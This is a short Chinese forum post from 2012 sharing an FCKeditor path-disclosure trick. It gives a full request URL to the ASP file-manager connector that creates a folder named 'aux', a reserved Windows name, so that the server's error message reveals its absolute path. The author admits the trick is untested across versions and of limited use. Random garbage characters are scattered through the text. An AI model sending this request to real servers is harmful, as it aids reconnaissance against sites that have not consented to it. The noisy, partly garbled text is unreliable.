标题: 最新FCKeditor爆绝对路径漏洞 [打印本页] 作者: admin 时间: 2012-11-21 13:39 标题: 最新FCKeditor爆绝对路径漏洞 代码:FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=%2F&NewFolderName=aux6 L9 ^/ \- s. X6 ]5 ?* a1 w
' \2 T* K/ d9 V4 ~/ k
7 w- n, h. \4 d# P8 O. I
版本未测试。。。 + v2 Q0 W( B( d& M $ \. W: [. l5 K. Z% h
原理:新建个aux文件夹,aux在windows系统不支持,所以会报错,爆出绝对路径,这个比较鸡肋。求大神别喷。。。 / ]- b1 p W, D / d* f! I8 D0 h6 u' _) N5 i
) H; H7 U. `1 i+ k. ?# ~+ L/ G
听说IIS都可以。。7 [+ s. i& Z- w